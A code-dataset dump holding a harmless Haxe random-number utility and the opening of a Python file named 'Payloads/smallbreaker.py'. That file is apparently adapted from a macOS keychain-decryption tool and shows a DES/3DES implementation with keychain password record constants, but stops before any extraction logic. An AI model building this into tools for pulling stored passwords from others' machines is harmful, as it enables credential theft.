{"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0} |
01010111/zerolib | zero/utilities/PRNG.hx | package zero.utilities;
/**
* A Simple Pseudo-Random Number Generator
*
* **Usage:**
*
* - get a random number using either `int()` or `float()`
* - or get a random number within a specific range using `int_range(min, max)` or `float_range(min, max)`
* - set a unique seed using `set_seed()` or `set_seed_from_string()`
*/
class PRNG
{
static var seed:UInt = set_seed_from_string(Date.now().toString());
public static function int():UInt return gen();
public static function float():Float return gen() / 2147483647;
public static function int_range(min:Float, max:Float):UInt return Math.round(min + (((max += .4999) - (min -= .4999)) * float()));
public static function float_range(min:Float, max:Float):Float return min + ((max - min) * float());
public static function set_seed(i:UInt) return seed = i;
public static function set_seed_from_string(s:String)
{
var hash = 5381;
for (c in s.split('')) hash = ((hash << 5) + hash * 33) ^ c.charCodeAt(0);
return seed = hash;
}
static function gen():UInt return seed = (seed * 16807) % 2147483647;
} | 1,078 | PRNG | hx | en | haxe | code | {"qsc_code_num_words": 159, "qsc_code_num_chars": 1078.0, "qsc_code_mean_word_length": 4.50314465, "qsc_code_frac_words_unique": 0.34591195, "qsc_code_frac_chars_top_2grams": 0.13687151, "qsc_code_frac_chars_top_3grams": 0.16759777, "qsc_code_frac_chars_top_4grams": 0.07122905, "qsc_code_frac_chars_dupe_5grams": 0.13407821, "qsc_code_frac_chars_dupe_6grams": 0.0, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.04581006, "qsc_code_frac_chars_whitespace": 0.16975881, "qsc_code_size_file_byte": 1078.0, "qsc_code_num_lines": 31.0, "qsc_code_num_chars_line_max": 133.0, "qsc_code_num_chars_line_mean": 34.77419355, "qsc_code_frac_chars_alphabet": 0.75418994, "qsc_code_frac_chars_comments": 0.28571429, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0} |
00xglitch/Bella | Payloads/smallbreaker.py | #!/usr/bin/python
# Author : n0fate
# E-Mail rapfer@gmail.com, n0fate@n0fate.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or (at
# your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
import argparse
import os, time
from sys import exit
import struct
from binascii import unhexlify
import datetime
from hexdump import hexdump
from ctypes import *
import sha
import hmac
from binascii import hexlify, unhexlify
from struct import pack
ECB = 0
CBC = 1
class des:
__pc1 = [56, 48, 40, 32, 24, 16, 8,
0, 57, 49, 41, 33, 25, 17,
9, 1, 58, 50, 42, 34, 26,
18, 10, 2, 59, 51, 43, 35,
62, 54, 46, 38, 30, 22, 14,
6, 61, 53, 45, 37, 29, 21,
13, 5, 60, 52, 44, 36, 28,
20, 12, 4, 27, 19, 11, 3
]
__left_rotations = [
1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1
]
# permuted choice key (table 2)
__pc2 = [
13, 16, 10, 23, 0, 4,
2, 27, 14, 5, 20, 9,
22, 18, 11, 3, 25, 7,
15, 6, 26, 19, 12, 1,
40, 51, 30, 36, 46, 54,
29, 39, 50, 44, 32, 47,
43, 48, 38, 55, 33, 52,
45, 41, 49, 35, 28, 31
]
# initial permutation IP
__ip = [57, 49, 41, 33, 25, 17, 9, 1,
59, 51, 43, 35, 27, 19, 11, 3,
61, 53, 45, 37, 29, 21, 13, 5,
63, 55, 47, 39, 31, 23, 15, 7,
56, 48, 40, 32, 24, 16, 8, 0,
58, 50, 42, 34, 26, 18, 10, 2,
60, 52, 44, 36, 28, 20, 12, 4,
62, 54, 46, 38, 30, 22, 14, 6
]
# Expansion table for turning 32 bit blocks into 48 bits
__expansion_table = [
31, 0, 1, 2, 3, 4,
3, 4, 5, 6, 7, 8,
7, 8, 9, 10, 11, 12,
11, 12, 13, 14, 15, 16,
15, 16, 17, 18, 19, 20,
19, 20, 21, 22, 23, 24,
23, 24, 25, 26, 27, 28,
27, 28, 29, 30, 31, 0
]
# The (in)famous S-boxes
__sbox = [ # S1
[14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7,
0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8,
4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0,
15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13], # S2
[15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10,
3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5,
0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15,
13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9], # S3
[10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8,
13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1,
13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7,
1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12], # S4
[7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15,
13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9,
10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4,
3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14], # S5
[2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9,
14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6,
4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14,
11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3], # S6
[12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11,
10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8,
9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 10, 1, 13, 11, 6,
4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13], # S7
[4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1,
13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6,
1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2,
6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12], # S8
[13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7,
1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2,
7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8,
2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11],
]
# 32-bit permutation function P used on the output of the S-boxes
__p = [
15, 6, 19, 20, 28, 11,
27, 16, 0, 14, 22, 25,
4, 17, 30, 9, 1, 7,
23, 13, 31, 26, 2, 8,
18, 12, 29, 5, 21, 10,
3, 24
]
# final permutation IP^-1
__fp = [
39, 7, 47, 15, 55, 23, 63, 31,
38, 6, 46, 14, 54, 22, 62, 30,
37, 5, 45, 13, 53, 21, 61, 29,
36, 4, 44, 12, 52, 20, 60, 28,
35, 3, 43, 11, 51, 19, 59, 27,
34, 2, 42, 10, 50, 18, 58, 26,
33, 1, 41, 9, 49, 17, 57, 25,
32, 0, 40, 8, 48, 16, 56, 24
]
# Type of crypting being done
ENCRYPT = 0x00
DECRYPT = 0x01
# Initialisation
def __init__(self, key, mode=ECB, IV=None):
if len(key) != 8:
raise ValueError("Invalid DES key size. Key must be exactly 8 bytes long.")
self.block_size = 8
self.key_size = 8
self.__padding = ''
# Set the passed in variables
self.setMode(mode)
if IV:
self.setIV(IV)
self.L = []
self.R = []
self.Kn = [[0] * 48] * 16 # 16 48-bit keys (K1 - K16)
self.final = []
self.setKey(key)
def getKey(self):
"""getKey() -> string"""
return self.__key
def setKey(self, key):
"""Will set the crypting key for this object. Must be 8 bytes."""
self.__key = key
self.__create_sub_keys()
def getMode(self):
"""getMode() -> pyDes.ECB or pyDes.CBC"""
return self.__mode
def setMode(self, mode):
"""Sets the type of crypting mode, pyDes.ECB or pyDes.CBC"""
self.__mode = mode
def getIV(self):
"""getIV() -> string"""
return self.__iv
def setIV(self, IV):
"""Will set the Initial Value, used in conjunction with CBC mode"""
if not IV or len(IV) != self.block_size:
raise ValueError("Invalid Initial Value (IV), must be a multiple of " + str(self.block_size) + " bytes")
self.__iv = IV
def getPadding(self):
"""getPadding() -> string of length 1. Padding character."""
return self.__padding
def __String_to_BitList(self, data):
"""Turn the string data, into a list of bits (1, 0)'s"""
l = len(data) * 8
result = [0] * l
pos = 0
for c in data:
i = 7
ch = ord(c)
while i >= 0:
if ch & (1 << i) != 0:
result[pos] = 1
else:
result[pos] = 0
pos += 1
i -= 1
return result
def __BitList_to_String(self, data):
"""Turn the list of bits -> data, into a string"""
result = ''
pos = 0
c = 0
while pos < len(data):
c += data[pos] << (7 - (pos % 8))
if (pos % 8) == 7:
result += chr(c)
c = 0
pos += 1
return result
def __permutate(self, table, block):
"""Permutate this block with the specified table"""
return map(lambda x: block[x], table)
# Transform the secret key, so that it is ready for data processing
# Create the 16 subkeys, K[1] - K[16]
def __create_sub_keys(self):
"""Create the 16 subkeys K[1] to K[16] from the given key"""
key = self.__permutate(des.__pc1, self.__String_to_BitList(self.getKey()))
i = 0
# Split into Left and Right sections
self.L = key[:28]
self.R = key[28:]
while i < 16:
j = 0
# Perform circular left shifts
while j < des.__left_rotations[i]:
self.L.append(self.L[0])
del self.L[0]
self.R.append(self.R[0])
del self.R[0]
j += 1
# Create one of the 16 subkeys through pc2 permutation
self.Kn[i] = self.__permutate(des.__pc2, self.L + self.R)
i += 1
# Main part of the encryption algorithm, the number cruncher :)
def __des_crypt(self, block, crypt_type):
"""Crypt the block of data through DES bit-manipulation"""
block = self.__permutate(des.__ip, block)
self.L = block[:32]
self.R = block[32:]
# Encryption starts from Kn[1] through to Kn[16]
if crypt_type == des.ENCRYPT:
iteration = 0
iteration_adjustment = 1
# Decryption starts from Kn[16] down to Kn[1]
else:
iteration = 15
iteration_adjustment = -1
i = 0
while i < 16:
# Make a copy of R[i-1], this will later become L[i]
tempR = self.R[:]
# Permutate R[i - 1] to start creating R[i]
self.R = self.__permutate(des.__expansion_table, self.R)
# Exclusive or R[i - 1] with K[i], create B[1] to B[8] whilst here
self.R = map(lambda x, y: x ^ y, self.R, self.Kn[iteration])
B = [self.R[:6], self.R[6:12], self.R[12:18], self.R[18:24], self.R[24:30], self.R[30:36], self.R[36:42],
self.R[42:]]
# Optimization: Replaced below commented code with above
#j = 0
#B = []
#while j < len(self.R):
# self.R[j] = self.R[j] ^ self.Kn[iteration][j]
# j += 1
# if j % 6 == 0:
# B.append(self.R[j-6:j])
# Permutate B[1] to B[8] using the S-Boxes
j = 0
Bn = [0] * 32
pos = 0
while j < 8:
# Work out the offsets
m = (B[j][0] << 1) + B[j][5]
n = (B[j][1] << 3) + (B[j][2] << 2) + (B[j][3] << 1) + B[j][4]
# Find the permutation value
v = des.__sbox[j][(m << 4) + n]
# Turn value into bits, add it to result: Bn
Bn[pos] = (v & 8) >> 3
Bn[pos + 1] = (v & 4) >> 2
Bn[pos + 2] = (v & 2) >> 1
Bn[pos + 3] = v & 1
pos += 4
j += 1
# Permutate the concatination of B[1] to B[8] (Bn)
self.R = self.__permutate(des.__p, Bn)
# Xor with L[i - 1]
self.R = map(lambda x, y: x ^ y, self.R, self.L)
# Optimization: This now replaces the below commented code
#j = 0
#while j < len(self.R):
# self.R[j] = self.R[j] ^ self.L[j]
# j += 1
# L[i] becomes R[i - 1]
self.L = tempR
i += 1
iteration += iteration_adjustment
# Final permutation of R[16]L[16]
self.final = self.__permutate(des.__fp, self.R + self.L)
return self.final
# Data to be encrypted/decrypted
def crypt(self, data, crypt_type):
"""Crypt the data in blocks, running it through des_crypt()"""
# Error check the data
if not data:
return ''
if len(data) % self.block_size != 0:
if crypt_type == des.DECRYPT: # Decryption must work on 8 byte blocks
raise ValueError(
"Invalid data length, data must be a multiple of " + str(self.block_size) + " bytes\n.")
if not self.getPadding():
raise ValueError("Invalid data length, data must be a multiple of " + str(
self.block_size) + " bytes\n. Try setting the optional padding character")
else:
data += (self.block_size - (len(data) % self.block_size)) * self.getPadding()
# print "Len of data: %f" % (len(data) / self.block_size)
if self.getMode() == CBC:
if self.getIV():
iv = self.__String_to_BitList(self.getIV())
else:
raise ValueError("For CBC mode, you must supply the Initial Value (IV) for ciphering")
# Split the data into blocks, crypting each one seperately
i = 0
dict = {}
result = []
#cached = 0
#lines = 0
while i < len(data):
# Test code for caching encryption results
#lines += 1
#if dict.has_key(data[i:i+8]):
#print "Cached result for: %s" % data[i:i+8]
# cached += 1
# result.append(dict[data[i:i+8]])
# i += 8
# continue
block = self.__String_to_BitList(data[i:i + 8])
# Xor with IV if using CBC mode
if self.getMode() == CBC:
if crypt_type == des.ENCRYPT:
block = map(lambda x, y: x ^ y, block, iv)
#j = 0
#while j < len(block):
# block[j] = block[j] ^ iv[j]
# j += 1
processed_block = self.__des_crypt(block, crypt_type)
if crypt_type == des.DECRYPT:
processed_block = map(lambda x, y: x ^ y, processed_block, iv)
#j = 0
#while j < len(processed_block):
# processed_block[j] = processed_block[j] ^ iv[j]
# j += 1
iv = block
else:
iv = processed_block
else:
processed_block = self.__des_crypt(block, crypt_type)
# Add the resulting crypted block to our list
#d = self.__BitList_to_String(processed_block)
#result.append(d)
result.append(self.__BitList_to_String(processed_block))
#dict[data[i:i+8]] = d
i += 8
# print "Lines: %d, cached: %d" % (lines, cached)
# Remove the padding from the last block
if crypt_type == des.DECRYPT and self.getPadding():
#print "Removing decrypt pad"
s = result[-1]
while s[-1] == self.getPadding():
s = s[:-1]
result[-1] = s
# Return the full crypted string
return ''.join(result)
def encrypt(self, data, pad=''):
"""encrypt(data, [pad]) -> string
data : String to be encrypted
pad : Optional argument for encryption padding. Must only be one byte
The data must be a multiple of 8 bytes and will be encrypted
with the already specified key. Data does not have to be a
multiple of 8 bytes if the padding character is supplied, the
data will then be padded to a multiple of 8 bytes with this
pad character.
"""
self.__padding = pad
return self.crypt(data, des.ENCRYPT)
def decrypt(self, data, pad=''):
"""decrypt(data, [pad]) -> string
data : String to be encrypted
pad : Optional argument for decryption padding. Must only be one byte
The data must be a multiple of 8 bytes and will be decrypted
with the already specified key. If the optional padding character
is supplied, then the un-encypted data will have the padding characters
removed from the end of the string. This pad removal only occurs on the
last 8 bytes of the data (last data block).
"""
self.__padding = pad
return self.crypt(data, des.DECRYPT)
#############################################################################
# Triple DES #
#############################################################################
class triple_des:
"""Triple DES encryption/decrytpion class
This algorithm uses the DES-EDE3 (when a 24 byte key is supplied) or
the DES-EDE2 (when a 16 byte key is supplied) encryption methods.
Supports ECB (Electronic Code Book) and CBC (Cypher Block Chaining) modes.
pyDes.des(key, [mode], [IV])
key -> The encryption key string, must be either 16 or 24 bytes long
mode -> Optional argument for encryption type, can be either pyDes.ECB
(Electronic Code Book), pyDes.CBC (Cypher Block Chaining)
IV -> Optional string argument, must be supplied if using CBC mode.
Must be 8 bytes in length.
"""
def __init__(self, key, mode=ECB, IV=None):
self.block_size = 8
self.setMode(mode)
self.__padding = ''
self.__iv = IV
self.setKey(key)
def getKey(self):
"""getKey() -> string"""
return self.__key
def setKey(self, key):
"""Will set the crypting key for this object. Either 16 or 24 bytes long."""
self.key_size = 24 # Use DES-EDE3 mode
if len(key) != self.key_size:
if len(key) == 16: # Use DES-EDE2 mode
self.key_size = 16
else:
raise ValueError("Invalid triple DES key size. Key must be either 16 or 24 bytes long")
if self.getMode() == CBC and (not self.getIV() or len(self.getIV()) != self.block_size):
raise ValueError("Invalid IV, must be 8 bytes in length") ## TODO: Check this
# modes get handled later, since CBC goes on top of the triple-des
self.__key1 = des(key[:8])
self.__key2 = des(key[8:16])
if self.key_size == 16:
self.__key3 = self.__key1
else:
self.__key3 = des(key[16:])
self.__key = key
def getMode(self):
"""getMode() -> pyDes.ECB or pyDes.CBC"""
return self.__mode
def setMode(self, mode):
"""Sets the type of crypting mode, pyDes.ECB or pyDes.CBC"""
self.__mode = mode
def getIV(self):
"""getIV() -> string"""
return self.__iv
def setIV(self, IV):
"""Will set the Initial Value, used in conjunction with CBC mode"""
self.__iv = IV
def xorstr(self, x, y):
"""Returns the bitwise xor of the bytes in two strings"""
if len(x) != len(y):
raise "string lengths differ %d %d" % (len(x), len(y))
ret = ''
for i in range(len(x)):
ret += chr(ord(x[i]) ^ ord(y[i]))
return ret
def encrypt(self, data, pad=''):
"""encrypt(data, [pad]) -> string
data : String to be encrypted
pad : Optional argument for encryption padding. Must only be one byte
The data must be a multiple of 8 bytes and will be encrypted
with the already specified key. Data does not have to be a
multiple of 8 bytes if the padding character is supplied, the
data will then be padded to a multiple of 8 bytes with this
pad character.
"""
if self.getMode() == ECB:
# simple
data = self.__key1.encrypt(data, pad)
data = self.__key2.decrypt(data)
return self.__key3.encrypt(data)
if self.getMode() == CBC:
raise "This code hasn't been tested yet"
if len(data) % self.block_size != 0:
raise "CBC mode needs datalen to be a multiple of blocksize (ignoring padding for now)"
# simple
lastblock = self.getIV()
retdata = ''
for i in range(0, len(data), self.block_size):
thisblock = data[i:i + self.block_size]
# the XOR for CBC
thisblock = self.xorstr(lastblock, thisblock)
thisblock = self.__key1.encrypt(thisblock)
thisblock = self.__key2.decrypt(thisblock)
lastblock = self.__key3.encrypt(thisblock)
retdata += lastblock
return retdata
raise "Not reached"
def decrypt(self, data, pad=''):
"""decrypt(data, [pad]) -> string
data : String to be encrypted
pad : Optional argument for decryption padding. Must only be one byte
The data must be a multiple of 8 bytes and will be decrypted
with the already specified key. If the optional padding character
is supplied, then the un-encypted data will have the padding characters
removed from the end of the string. This pad removal only occurs on the
last 8 bytes of the data (last data block).
"""
if self.getMode() == ECB:
# simple
data = self.__key3.decrypt(data)
data = self.__key2.encrypt(data)
return self.__key1.decrypt(data, pad)
if self.getMode() == CBC:
if len(data) % self.block_size != 0:
raise "Can only decrypt multiples of blocksize"
lastblock = self.getIV()
retdata = ''
for i in range(0, len(data), self.block_size):
# can I arrange this better? probably...
cipherchunk = data[i:i + self.block_size]
thisblock = self.__key3.decrypt(cipherchunk)
thisblock = self.__key2.encrypt(thisblock)
thisblock = self.__key1.decrypt(thisblock)
retdata += self.xorstr(lastblock, thisblock)
lastblock = cipherchunk
return retdata
raise "Not reached"
KEY_TYPE = {
0x00+0x0F : 'CSSM_KEYCLASS_PUBLIC_KEY',
0x01+0x0F : 'CSSM_KEYCLASS_PRIVATE_KEY',
0x02+0x0F : 'CSSM_KEYCLASS_SESSION_KEY',
0x03+0x0F : 'CSSM_KEYCLASS_SECRET_PART',
0xFFFFFFFF : 'CSSM_KEYCLASS_OTHER'
}
CSSM_ALGORITHMS = {
0 : 'CSSM_ALGID_NONE',
1 : 'CSSM_ALGID_CUSTOM',
2 : 'CSSM_ALGID_DH',
3 : 'CSSM_ALGID_PH',
4 : 'CSSM_ALGID_KEA',
5 : 'CSSM_ALGID_MD2',
6 : 'CSSM_ALGID_MD4',
7 : 'CSSM_ALGID_MD5',
8 : 'CSSM_ALGID_SHA1',
9 : 'CSSM_ALGID_NHASH',
10 : 'CSSM_ALGID_HAVAL:',
11 : 'CSSM_ALGID_RIPEMD',
12 : 'CSSM_ALGID_IBCHASH',
13 : 'CSSM_ALGID_RIPEMAC',
14 : 'CSSM_ALGID_DES',
15 : 'CSSM_ALGID_DESX',
16 : 'CSSM_ALGID_RDES',
17 : 'CSSM_ALGID_3DES_3KEY_EDE',
18 : 'CSSM_ALGID_3DES_2KEY_EDE',
19 : 'CSSM_ALGID_3DES_1KEY_EEE',
20 : 'CSSM_ALGID_3DES_3KEY_EEE',
21 : 'CSSM_ALGID_3DES_2KEY_EEE',
22 : 'CSSM_ALGID_IDEA',
23 : 'CSSM_ALGID_RC2',
24 : 'CSSM_ALGID_RC5',
25 : 'CSSM_ALGID_RC4',
26 : 'CSSM_ALGID_SEAL',
27 : 'CSSM_ALGID_CAST',
28 : 'CSSM_ALGID_BLOWFISH',
29 : 'CSSM_ALGID_SKIPJACK',
30 : 'CSSM_ALGID_LUCIFER',
31 : 'CSSM_ALGID_MADRYGA',
32 : 'CSSM_ALGID_FEAL',
33 : 'CSSM_ALGID_REDOC',
34 : 'CSSM_ALGID_REDOC3',
35 : 'CSSM_ALGID_LOKI',
36 : 'CSSM_ALGID_KHUFU',
37 : 'CSSM_ALGID_KHAFRE',
38 : 'CSSM_ALGID_MMB',
39 : 'CSSM_ALGID_GOST',
40 : 'CSSM_ALGID_SAFER',
41 : 'CSSM_ALGID_CRAB',
42 : 'CSSM_ALGID_RSA',
43 : 'CSSM_ALGID_DSA',
44 : 'CSSM_ALGID_MD5WithRSA',
45 : 'CSSM_ALGID_MD2WithRSA',
46 : 'CSSM_ALGID_ElGamal',
47 : 'CSSM_ALGID_MD2Random',
48 : 'CSSM_ALGID_MD5Random',
49 : 'CSSM_ALGID_SHARandom',
50 : 'CSSM_ALGID_DESRandom',
51 : 'CSSM_ALGID_SHA1WithRSA',
52 : 'CSSM_ALGID_CDMF',
53 : 'CSSM_ALGID_CAST3',
54 : 'CSSM_ALGID_CAST5',
55 : 'CSSM_ALGID_GenericSecret',
56 : 'CSSM_ALGID_ConcatBaseAndKey',
57 : 'CSSM_ALGID_ConcatKeyAndBase',
58 : 'CSSM_ALGID_ConcatBaseAndData',
59 : 'CSSM_ALGID_ConcatDataAndBase',
60 : 'CSSM_ALGID_XORBaseAndData',
61 : 'CSSM_ALGID_ExtractFromKey',
62 : 'CSSM_ALGID_SSL3PreMasterGen',
63 : 'CSSM_ALGID_SSL3MasterDerive',
64 : 'CSSM_ALGID_SSL3KeyAndMacDerive',
65 : 'CSSM_ALGID_SSL3MD5_MAC',
66 : 'CSSM_ALGID_SSL3SHA1_MAC',
67 : 'CSSM_ALGID_PKCS5_PBKDF1_MD5',
68 : 'CSSM_ALGID_PKCS5_PBKDF1_MD2',
69 : 'CSSM_ALGID_PKCS5_PBKDF1_SHA1',
70 : 'CSSM_ALGID_WrapLynks',
71 : 'CSSM_ALGID_WrapSET_OAEP',
72 : 'CSSM_ALGID_BATON',
73 : 'CSSM_ALGID_ECDSA',
74 : 'CSSM_ALGID_MAYFLY',
75 : 'CSSM_ALGID_JUNIPER',
76 : 'CSSM_ALGID_FASTHASH',
77 : 'CSSM_ALGID_3DES',
78 : 'CSSM_ALGID_SSL3MD5',
79 : 'CSSM_ALGID_SSL3SHA1',
80 : 'CSSM_ALGID_FortezzaTimestamp',
81 : 'CSSM_ALGID_SHA1WithDSA',
82 : 'CSSM_ALGID_SHA1WithECDSA',
83 : 'CSSM_ALGID_DSA_BSAFE',
84 : 'CSSM_ALGID_ECDH',
85 : 'CSSM_ALGID_ECMQV',
86 : 'CSSM_ALGID_PKCS12_SHA1_PBE',
87 : 'CSSM_ALGID_ECNRA',
88 : 'CSSM_ALGID_SHA1WithECNRA',
89 : 'CSSM_ALGID_ECES',
90 : 'CSSM_ALGID_ECAES',
91 : 'CSSM_ALGID_SHA1HMAC',
92 : 'CSSM_ALGID_FIPS186Random',
93 : 'CSSM_ALGID_ECC',
94 : 'CSSM_ALGID_MQV',
95 : 'CSSM_ALGID_NRA',
96 : 'CSSM_ALGID_IntelPlatformRandom',
97 : 'CSSM_ALGID_UTC',
98 : 'CSSM_ALGID_HAVAL3',
99 : 'CSSM_ALGID_HAVAL4',
100 : 'CSSM_ALGID_HAVAL5',
101 : 'CSSM_ALGID_TIGER',
102 : 'CSSM_ALGID_MD5HMAC',
103 : 'CSSM_ALGID_PKCS5_PBKDF2',
104 : 'CSSM_ALGID_RUNNING_COUNTER',
0x7FFFFFFF : 'CSSM_ALGID_LAST'
}
#CSSM TYPE
## http://www.opensource.apple.com/source/libsecurity_cssm/libsecurity_cssm-36064/lib/cssmtype.h
########## CSSM_DB_RECORDTYPE #############
#/* Industry At Large Application Name Space Range Definition */
#/* AppleFileDL record types. */
CSSM_DB_RECORDTYPE_APP_DEFINED_START = 0x80000000
CSSM_DL_DB_RECORD_GENERIC_PASSWORD = CSSM_DB_RECORDTYPE_APP_DEFINED_START + 0
CSSM_DL_DB_RECORD_INTERNET_PASSWORD = CSSM_DB_RECORDTYPE_APP_DEFINED_START + 1
CSSM_DL_DB_RECORD_APPLESHARE_PASSWORD = CSSM_DB_RECORDTYPE_APP_DEFINED_START + 2
CSSM_DL_DB_RECORD_USER_TRUST = CSSM_DB_RECORDTYPE_APP_DEFINED_START + 3
CSSM_DL_DB_RECORD_X509_CRL = CSSM_DB_RECORDTYPE_APP_DEFINED_START + 4
CSSM_DL_DB_RECORD_UNLOCK_REFERRAL = CSSM_DB_RECORDTYPE_APP_DEFINED_START + 5
CSSM_DL_DB_RECORD_EXTENDED_ATTRIBUTE = CSSM_DB_RECORDTYPE_APP_DEFINED_START + 6
CSSM_DL_DB_RECORD_X509_CERTIFICATE = CSSM_DB_RECORDTYPE_APP_DEFINED_START + 0x1000
CSSM_DL_DB_RECORD_METADATA = CSSM_DB_RECORDTYPE_APP_DEFINED_START + 0x8000 ## DBBlob
CSSM_DB_RECORDTYPE_APP_DEFINED_END = 0xffffffff
#/* Record Types defined in the Schema Management Name Space */
CSSM_DB_RECORDTYPE_SCHEMA_START = 0x00000000
CSSM_DL_DB_SCHEMA_INFO = CSSM_DB_RECORDTYPE_SCHEMA_START + 0
CSSM_DL_DB_SCHEMA_INDEXES = CSSM_DB_RECORDTYPE_SCHEMA_START + 1
CSSM_DL_DB_SCHEMA_ATTRIBUTES = CSSM_DB_RECORDTYPE_SCHEMA_START + 2
CSSM_DL_DB_SCHEMA_PARSING_MODULE = CSSM_DB_RECORDTYPE_SCHEMA_START + 3
CSSM_DB_RECORDTYPE_SCHEMA_END = CSSM_DB_RECORDTYPE_SCHEMA_START + 4
